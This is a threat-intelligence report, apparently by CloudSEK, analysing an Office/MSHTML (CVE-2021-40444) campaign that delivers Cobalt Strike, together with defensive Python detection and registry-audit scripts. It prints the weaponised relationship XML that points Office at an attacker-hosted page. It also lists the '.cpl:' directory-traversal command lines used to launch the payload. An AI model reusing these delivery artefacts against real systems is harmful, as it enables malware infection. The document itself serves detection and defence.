Trident Campaign: Microsoft Office RCE Zero-day Exploitation Techniques and Mitigation Measures

Summary

Following several attacks targeting the RCE flaw in MSHTML, the CloudSEK Threat Intelligence Research team shares the TTPs and IOCs of the attack sequence.

Overview

The MSHTML (Microsoft HTML) engine, aka Trident, is a browser engine developed by Microsoft for Internet Explorer. The Microsoft Office suite also embeds MSHTML, and threat actors are abusing it to gain code execution on targeted systems. Attackers craft a malicious ActiveX control that is loaded by a Microsoft Office document hosting the browser rendering engine. They then persuade the victim to open this malicious document, which in turn triggers the logic flaw in MSHTML. These malicious documents are delivered via Office 365.

By default, documents downloaded from the Internet are opened in Protected View or Application Guard for Office, both of which defend against such attacks. However, if the user leaves the protected mode and allows the content to load, bypassing these mitigations, the target machine is exploited and malware agents such as the Cobalt Strike Beacon are deployed. Microsoft Defender for Endpoint has been updated to flag such attacks, displaying a warning that reads: “Suspicious Cpl File Execution.”

Based on the quality of the vulnerability research and the scale at which users are being targeted, it is most likely that an advanced adversary is responsible for the ongoing campaign. The CloudSEK Threat Intelligence Research team has obtained malicious artifacts in order to retrieve the TTPs (Tactics, Techniques, and Procedures) of the adversaries leveraging the MSHTML RCE bug, and to provide better security for our clients. This report provides a technical analysis of the campaign. Specifics regarding the exploit for the vulnerability have been intentionally withheld to avoid misuse in the public domain, as a large number of systems remain susceptible.

Remote Template Injection Technique

Microsoft Word and Excel documents are ZIP archives of XML files that hold the content and metadata the user entered while creating the document in the corresponding Office application. In simple words, one can unzip a .docx file and see the internal XML parts and their metadata. The relationships directory (word/_rels in an unzipped Word file) plays a very significant role in weaponizing a seemingly benign document.

The process by which users are attacked via the Trident vulnerability

The ‘_rels’ directory stores relationship metadata that tells Office where to fetch the parts, including the template, used by the document when it is loaded. An SMB path or HTTP URL of an asset controlled by the attacker can be supplied here to make Office fetch and execute a malicious payload. To spot the remote template injection vector, search the relationship XML for Relationship elements whose TargetMode attribute is set to ”External”: the Target attribute of such an element holds the URL (in this case, the malicious one) that Office will fetch. Office then downloads the file that the URL points to.

<?xml version="1.0" encoding="UTF-8" standalone="true"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Target="theme/theme1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Id="rId8"/>
  <Relationship Target="webSettings.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Id="rId3"/>
  <Relationship Target="fontTable.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Id="rId7"/>
  <Relationship Target="settings.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Id="rId2"/>
  <Relationship Target="styles.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Id="rId1"/>
  <Relationship Target="mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Id="rId6" TargetMode="External"/>
  <Relationship Target="media/image2.wmf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId5"/>
  <Relationship Target="media/image1.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId4"/>
</Relationships>

Remote template injection used in the obtained Trident campaign samples

The malicious docx sample, when opened, loads a webpage named ‘side.html’, hosted on an attacker-controlled server, via remote template injection. Since the campaign targets the MSHTML engine that Office supports, loading the HTML document occurs naturally.
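As an added illustration (not part of the original report or of CloudSEK's tooling), the following Python script implements the check described above: it opens a .docx as a ZIP archive, parses every .rels part, and reports Relationship elements whose TargetMode is External, rating oleObject, attachedTemplate, frame and subDocument targets and any mhtml: target as high risk while treating ordinary hyperlinks as informational. The in-memory sample document is constructed here and modelled on the relationship part shown above, reusing the side.html URL quoted in this report; the high-risk type set is an assumption of this example.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

# Relationship types where an External target makes Office fetch and activate remote
# content when the document opens (assumed set for this example); a plain hyperlink
# is only followed on click and is reported as informational.
HIGH_RISK_TYPES = {"oleObject", "attachedTemplate", "frame", "subDocument"}

# Constructed relationship part modelled on the one shown in this report; the
# oleObject target reuses the side.html URL quoted above.
SAMPLE_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/>
<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html" TargetMode="External"/>
<Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/" TargetMode="External"/>
<Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpeg"/>
</Relationships>
"""


def build_sample_docx():
    """Return the bytes of a minimal, constructed .docx containing SAMPLE_RELS."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", SAMPLE_RELS)
    return buf.getvalue()


def find_external_relationships(docx_bytes):
    """Scan every .rels part of an OOXML package for External targets."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for part in zf.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                # Internal targets point inside the package; only External ones leave it.
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                kind = rel.get("Type", "").rsplit("/", 1)[-1]
                if target.lower().startswith("mhtml:") or kind in HIGH_RISK_TYPES:
                    severity = "high"
                elif kind == "hyperlink":
                    severity = "info"
                else:
                    severity = "medium"
                findings.append({"part": part, "id": rel.get("Id"), "type": kind,
                                 "target": target, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in find_external_relationships(build_sample_docx()):
        print(f"[{f['severity']}] {f['part']} {f['id']} {f['type']} -> {f['target']}")
```

On a real file, pass the bytes of the .docx (or .xlsx, since the scan covers every .rels part in the package) to find_external_relationships and act on the high findings; the mhtml: prefix on an oleObject target is the shape seen in this campaign.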

Exploitation

The malicious webpage ‘side.html’ fetched by the document contains heavily obfuscated JavaScript code that exploits CVE-2021-40444, a vulnerability with no official patch at the time of writing this report. Execution of this stage retrieves the final command-and-control payload.

HTML contents of the malicious webpage ‘side.html’

Analysis of the exploit after deobfuscating the JavaScript gives a fair idea of the complete exploitation process. Considering the sensitive nature of the issue, this report does not cover details of the vulnerability. A section of the deobfuscated exploit code is shown below. The attacker reaches the vulnerability through ActiveXObject to gain code execution. The code then reaches out to the attacker’s server that hosts the final payload. The file ‘ministry.cab’ is a Windows cabinet file, similar to a zip archive, which contains the Cobalt Strike beacon in the form of a CPL file masquerading as an INF file.

A section of the deobfuscated exploit code

The cabinet file is retrieved from a remote URL, and the INF file is stored in one of the directories listed in the image below. The exploit code abuses directory traversal to execute the Cobalt Strike CPL beacon, which masquerades as ‘champion.inf’.

A section of the deobfuscated exploit code


The CPL payload ‘champion.inf’ is eventually executed by ‘rundll32.exe’ with the following command-line argument: ‘.cpl:…/…/…/AppData/Local/Temp/Low/championship.inf’

Cobalt Strike Beacon

Basic analysis of the PE image shows that the ‘champion.inf’ file is, in fact, a 64-bit DLL (Dynamic Link Library): its first two bytes are the “MZ” signature. A CPL file is a Control Panel item that carries executable code. A DLL becomes a CPL when it exports a particular function called ‘CplApplet’, after which it can be run as readily as any other PE (Portable Executable).
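The following Python function, added here as an example rather than taken from the report or from CloudSEK, performs the masquerade check described above on a file's raw bytes: it verifies the MZ signature, follows e_lfanew to the PE header, reads the machine type and the DLL characteristic flag, and searches for the exported name CplApplet. The 64-bit DLL header it inspects is constructed inline (not the campaign sample), and the list of extensions treated as normal for a PE is an assumption of this example.

```python
import struct

IMAGE_FILE_MACHINE_I386 = 0x14C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_DLL = 0x2000
# Extensions under which a PE image is expected (assumed set for this example).
PE_EXTENSIONS = {"exe", "dll", "cpl", "sys", "ocx", "scr", "drv"}


def build_sample_dll_header():
    """Constructed header bytes of a 64-bit DLL, enough to exercise the checks below."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"                              # DOS signature
    struct.pack_into("<I", dos, 0x3C, e_lfanew)   # offset of the PE header
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    file_header = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_AMD64, 1, 0, 0, 0, 0xF0,
                              IMAGE_FILE_DLL | 0x22)
    # Stand-in for the rest of the image, including an export-name-table entry.
    body = b"\x00" * 0x40 + b"CplApplet\x00" + b"\x00" * 0x20
    return bytes(dos) + b"PE\x00\x00" + file_header + body


def inspect_pe_masquerade(filename, data):
    """Report whether a file is a PE image hiding behind a non-executable extension."""
    result = {"filename": filename, "is_pe": False, "arch": None, "is_dll": False,
              "exports_cplapplet": False, "masquerade": False}
    if len(data) < 0x40 or data[:2] != b"MZ":
        return result
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return result
    machine, _, _, _, _, _, characteristics = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    result["is_pe"] = True
    result["arch"] = {IMAGE_FILE_MACHINE_AMD64: "x64", IMAGE_FILE_MACHINE_I386: "x86"}.get(
        machine, hex(machine))
    result["is_dll"] = bool(characteristics & IMAGE_FILE_DLL)
    # Heuristic: exported names are stored as NUL-terminated ASCII in the export name
    # table, so a byte search finds CplApplet without walking the export directory.
    result["exports_cplapplet"] = b"CplApplet\x00" in data
    ext = filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    result["masquerade"] = ext not in PE_EXTENSIONS
    return result


if __name__ == "__main__":
    print(inspect_pe_masquerade("champion.inf", build_sample_dll_header()))
```

Run it over the contents of a Temp directory after an incident: a .inf (or any non-executable extension) that comes back with is_pe, is_dll and exports_cplapplet all set matches the pattern of the beacon described above.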

Image analysis of ‘Champion.inf’


Windows Defender flags this as “Trojan:Win32/Agent.SA”, and other security solutions flag it as “Trojan.Win64.COBEACON.SUZ”.

Dynamic Analysis of the Exploit

When the exploit code successfully triggers the vulnerability to gain remote code execution, the payload deployed is the Cobalt Strike beacon discussed above. CloudSEK researchers recreated the exploit code and ran it to better understand the vulnerability. They used Process Monitor to analyse the execution flow of the Office process (WINWORD.EXE) and found a few interesting results, which are shared below.

Loading of Vulnerable Module

The Microsoft Word application loads mshtml.dll from the Windows directory. The vulnerability resides in one of the functions defined in this DLL.


Windows Directory DLL files

Based on CloudSEK’s testing, mshtml.dll is not loaded into WINWORD.EXE by default. When the attacker delivers an exploit written in HTML via remote template injection, the handler specified in the relationship’s Target attribute is mhtml. This causes the mshtml module to be loaded into the Word process to render the HTML page within the Word document.

File Writing

The final payload championship.inf is extracted from the initial ministry.cab archive and written to the Temp directory. This is most likely the effect of the vulnerability itself, which adversaries abuse to write user-controlled data to disk.

Code Execution

CloudSEK researchers also identified multiple control.exe processes spawned to execute the CPL payload. Each of these processes searches for the champion.inf file in directories that are hardcoded in the exploit. The hardcoded paths to which the payload is dropped are listed below.

cpl:…/…/…/AppData/Local/Temp/Low/championship.inf
.cpl:…/…/…/AppData/Local/Temp/championship.inf
cpl:…/…/…/…/AppData/Local/Temp/Low/championship.inf
cpl:…/…/…/…/AppData/Local/Temp/championship.inf
.cpl:…/…/…/…/…/Temp/Low/championship.inf
.cpl:…/…/…/…/…/Temp/championship.inf
.cpl:…/…/Low/championship.inf
.cpl:…/…/championship.inf

The command lines provided to control.exe are shown in the image provided below. The argument provided is the location of the final payload and it is eventually executed by rundll32.
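As an added example (not from the original report), the following Python detection logic codifies the process-tree observation above: a control.exe or rundll32.exe process whose command line carries a .cpl: argument pointing at a traversal path, a non-.cpl file or a Temp directory is flagged, with the severity raised when the parent is an Office process. The four process-creation events it runs over are constructed here in a Sysmon-like field layout; the traversal form of the paths and the field names are assumptions of this example.

```python
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
CPL_HOSTS = {"control.exe", "rundll32.exe"}
# A ".cpl:<path>" argument names the Control Panel item to run; the path is captured
# up to the next whitespace or quote.
CPL_ARG = re.compile(r"\.cpl:(?P<path>[^\s\"']+)", re.IGNORECASE)
TRAVERSAL = re.compile(r"(^|[\\/])\.\.(?=[\\/]|$)")

# Constructed process-creation events (not real telemetry); field names follow the
# Sysmon Event ID 1 convention.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\control.exe",
     "CommandLine": r'"C:\Windows\System32\control.exe" ".cpl:../../../AppData/Local/Temp/Low/championship.inf"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\System32\timedate.cpl"'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" ".cpl:..\..\..\AppData\Local\Temp\championship.inf"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\control.exe",
     "CommandLine": r'"C:\Windows\System32\control.exe" ".cpl:C:\Windows\System32\inetcpl.cpl"'},
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess_event(event):
    """Return an alert dict for a suspicious CPL launch, or None for a benign-looking one."""
    host = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    if host not in CPL_HOSTS:
        return None
    match = CPL_ARG.search(event.get("CommandLine", ""))
    if not match:
        return None
    path = match.group("path")
    normalised = path.replace("\\", "/").lower()
    reasons = []
    if TRAVERSAL.search(path):
        reasons.append("directory traversal in .cpl: target")
    if not normalised.endswith(".cpl"):
        reasons.append("target extension is not .cpl")
    if "/temp/" in normalised:
        reasons.append("target lives under a Temp directory")
    office_parent = parent in OFFICE_PARENTS
    if office_parent:
        reasons.append(f"spawned by Office process {parent}")
    if not reasons:
        return None
    # An Office parent plus any path anomaly is the shape seen in this campaign.
    severity = "high" if office_parent and len(reasons) > 1 else "medium"
    return {"host": host, "parent": parent, "target": path,
            "severity": severity, "reasons": reasons}


def run_detection(events):
    """Apply assess_event to each event and keep the alerts, in input order."""
    return [alert for alert in map(assess_event, events) if alert]


if __name__ == "__main__":
    for alert in run_detection(SAMPLE_EVENTS):
        print(alert["severity"], alert["host"], alert["target"], "; ".join(alert["reasons"]))
```

The same logic ports directly to a SIEM query: restrict to control.exe and rundll32.exe, require ".cpl:" in the command line, and score on traversal, extension and parent process rather than on the exact payload name, so that renamed payloads are still caught.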

Guidelines

Based on the official guidelines posted by Microsoft, Windows users need to follow the instructions given below:

  • Disable ActiveX via Group Policy*
  • Disable ActiveX on individual systems via registry
  • Disable shell preview in Windows Explorer
  • Enterprise customers who manage updates should select the detection build 1.349.22.0

*Disabling ActiveX on Windows systems will have side effects depending on the user environment. For detailed information, refer to the official documentation issued by Microsoft.
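For the second guideline, the following Python helper, added here and not part of the report, parses an exported .reg file, audits the per-zone ActiveX settings, and renders the corresponding workaround file. The key path, the value names 1001 and 1004 and the value 3 are those Microsoft published in its registry workaround for CVE-2021-40444, reproduced here from memory, so check them against the MSRC advisory linked under References before applying; the sample export is constructed and deliberately leaves two zones incomplete.

```python
import re

ZONES_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones"
ZONES = ("0", "1", "2", "3")   # Local Machine, Local Intranet, Trusted Sites, Internet
# Per Microsoft's published workaround (recalled for this example; verify against the
# MSRC advisory): 1001 = download signed ActiveX controls, 1004 = download unsigned
# ActiveX controls, and 3 = disable.
REQUIRED = {"1001": 3, "1004": 3}

KEY_LINE = re.compile(r"^\[(.+)\]$")
DWORD_LINE = re.compile(r'^"([^"]+)"=dword:([0-9A-Fa-f]{8})$')

# Constructed 'reg export' output: zone 2 leaves unsigned controls enabled and zone 3
# has no 1004 value at all.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1001"=dword:00000003
"1004"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1001"=dword:00000003
"""


def parse_reg_export(text):
    """Parse the subset of .reg syntax that 'reg export' emits for DWORD values."""
    settings, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        key = KEY_LINE.match(line)
        if key:
            current = key.group(1)
            settings.setdefault(current, {})
            continue
        value = DWORD_LINE.match(line)
        if value and current is not None:
            settings[current][value.group(1)] = int(value.group(2), 16)
    return settings


def audit_activex_zones(settings):
    """List every zone/value pair that is missing or not set to the required DWORD."""
    gaps = []
    for zone in ZONES:
        values = settings.get(f"{ZONES_KEY}\\{zone}", {})
        for name, wanted in REQUIRED.items():
            actual = values.get(name)
            if actual != wanted:
                gaps.append({"zone": zone, "value": name, "actual": actual, "expected": wanted})
    return gaps


def render_workaround_reg():
    """Render a .reg file that sets the required values in all four zones."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for zone in ZONES:
        lines.append(f"[{ZONES_KEY}\\{zone}]")
        for name, wanted in REQUIRED.items():
            lines.append(f'"{name}"=dword:{wanted:08x}')
        lines.append("")
    return "\r\n".join(lines)


if __name__ == "__main__":
    for gap in audit_activex_zones(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(f"zone {gap['zone']}: {gap['value']} is {gap['actual']}, expected {gap['expected']}")
```

To audit a real machine, export the key with reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones" zones.reg and read the file with encoding="utf-16", since reg export typically writes UTF-16 with a byte-order mark; the output of render_workaround_reg can be saved and applied with reg import, keeping in mind the side effects noted above.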

Indicators of Compromise (IOCs)

(IOC tables: images in the original post)

References

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
